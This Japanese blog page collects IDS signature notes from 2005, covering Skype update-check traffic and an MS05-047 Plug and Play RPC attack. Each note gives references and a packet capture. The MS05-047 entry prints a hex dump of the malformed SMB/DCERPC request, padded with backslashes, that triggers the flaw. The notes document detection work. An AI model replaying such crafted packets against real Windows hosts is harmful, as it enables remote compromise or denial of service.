01d0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
01e0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
01f0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0200 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0210 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0220 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0230 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0240 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0250 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0260 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0270 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0280 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0290 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
02a0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
02b0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
02c0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
02d0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
02e0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
02f0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0300 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0310 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0320 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0330 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0340 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0350 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0360 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0370 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0380 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0390 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
03a0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
03b0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
03c0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
03d0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
03e0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
03f0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................



いいね!した人  |  リブログ(0)

テーマ:

■シグネチャの説明

http://xforce.iss.net/xforce/xfdb/16252



■References
PestPatrol Web site
Skype
http://www.pestpatrol.com/pestinfo/s/skype.asp


■検知イベント


HTTP_Skype


■パケット(Skype2.0BETA)

GET /ui/0/1.4.0.84/ja/getlatestversion?ver=1.4.0.84&uhash=163e57355f5b77fd72808174b0cd58d4e HTTP/1.1

User-Agent: Skype. 1.4

Host: ui.skype.com

Cache-Control: no-cache

Cookie: SC=LC=ja:CCY=:CC=:TZ=:VER=0/1.4.0.84/:TS=1135438814:TM=1135438685

HTTP/1.1 200 OK

Date: Sat, 24 Dec 2005 15:42:47 GMT

Server: Apache

Last-Modified: Tue, 25 Oct 2005 23:05:25 GMT

ETag: "1b0109-9-2ccb3740"

Accept-Ranges: bytes

Content-Length: 9

Connection: close

Content-Type: text/plain; charset=utf-8

Content-Language: en

1.4.0.79


ハニーネットプロジェクト, 園田 道夫, ドキュメントシステム
ハニーネットプロジェクト―汝の敵を知れ:セキュリティ脅威者の分析
いいね!した人  |  リブログ(0)

テーマ:

■シグネチャの説明

http://www.iss.net/security_center/static/22481.php



■References
Microsoft Security Bulletin MS05-047
Vulnerability in Plug and Play Could Allow Remote Code Execution and Local Elevation of Privilege (905749)
http://www.microsoft.com/technet/security/bulletin/ms05-047.mspx

CVE
CVE-2005-2120
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2120



■IDS検知


MSRPC_PlugAndPlay_DeviceSlashBo


パケット

No. Time Source Destination Protocol Info
5236 2005-12-24 06:58:04.253249 192.168.221.110 192.168.221.180 DCERPC Request: call_id: 1[Short Frame]

Frame 5236 (1514 bytes on wire, 1514 bytes captured)
Ethernet II, Src: 00:10:5a:64:fa:71, Dst: 00:d0:c9:96:61:5c
Internet Protocol, Src Addr: 192.168.221.110 (192.168.221.110), Dst Addr: 192.168.221.180 (192.168.221.180)
Transmission Control Protocol, Src Port: 1031 (1031), Dst Port: microsoft-ds (445), Seq: 586, Ack: 448, Len: 1448
NetBIOS Session Service
SMB (Server Message Block Protocol)
SMB Pipe Protocol
[Short Frame: DCERPC]

0000 00 d0 c9 96 61 5c 00 10 5a 64 fa 71 08 00 45 00 ....a\..Zd.q..E.
0010 05 dc 05 ff 40 00 40 06 f2 a8 c0 a8 dd 6e c0 a8 ....@.@......n ..
0020 dd b4 04 07 01 bd 65 40 19 9d f7 51 e3 3e 80 18 ......e@...Q .>..
0030 7d 78 a9 9c 00 00 01 01 08 0a 00 2c c0 53 00 00 }x.........,.S..
0040 1b b2 00 00 08 84 ff 53 4d 42 25 00 00 00 00 18 .......SMB%.....
0050 07 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 08 ................
0060 ff fe 00 08 80 01 10 00 00 30 08 00 00 00 10 00 .........0......
0070 00 00 00 00 00 00 00 00 00 00 00 54 00 30 08 54 ...........T.0.T
0080 00 02 00 26 00 00 40 41 08 a2 5c 00 50 00 49 00 ...&..@A..\.P.I .
0090 50 00 45 00 5c 00 00 00 00 00 05 00 00 03 10 00 P.E.\...........
00a0 00 00 30 08 00 00 01 00 00 00 18 08 00 00 00 00 ..0.............
00b0 0a 00 44 f7 12 00 00 04 00 00 00 00 00 00 00 04 ..D.............
00c0 00 00 48 00 54 00 52 00 45 00 45 00 5c 00 52 00 ..H.T.R.E.E.\.R.
00d0 4f 00 4f 00 54 00 5c 00 5c 00 5c 00 5c 00 5c 00 O.O.T.\.\.\.\.\.
00e0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
00f0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0100 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0110 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0120 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0130 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0140 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0150 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0160 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0170 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0180 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0190 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
01a0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
01b0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
01c0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
01d0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
01e0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
01f0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0200 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0210 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0220 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0230 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0240 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0250 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0260 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0270 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0280 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0290 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
02a0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
02b0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
02c0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
02d0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
02e0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
02f0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0300 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0310 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0320 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0330 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0340 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0350 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0360 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0370 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0380 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0390 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
03a0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
03b0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
03c0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
03d0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
03e0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
03f0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0400 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0410 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0420 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0430 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0440 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0450 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0460 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0470 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0480 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0490 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
04a0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
04b0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
04c0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
04d0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
04e0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
04f0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0500 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0510 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0520 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0530 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0540 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0550 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0560 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0570 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0580 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
0590 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
05a0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
05b0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
05c0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
05d0 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.\.\.\.
05e0 5c 00 5c 00 5c 00 5c 00 5c 00 \.\.\.\.\.


ハニーネットプロジェクト, 園田 道夫, ドキュメントシステム
ハニーネットプロジェクト―汝の敵を知れ:セキュリティ脅威者の分析
いいね!した人  |  リブログ(0)

AD

ブログをはじめる

たくさんの芸能人・有名人が
書いているAmebaブログを
無料で簡単にはじめることができます。

公式トップブロガーへ応募

多くの方にご紹介したいブログを
執筆する方を「公式トップブロガー」
として認定しております。

芸能人・有名人ブログを開設

Amebaブログでは、芸能人・有名人ブログを
ご希望される著名人の方/事務所様を
随時募集しております。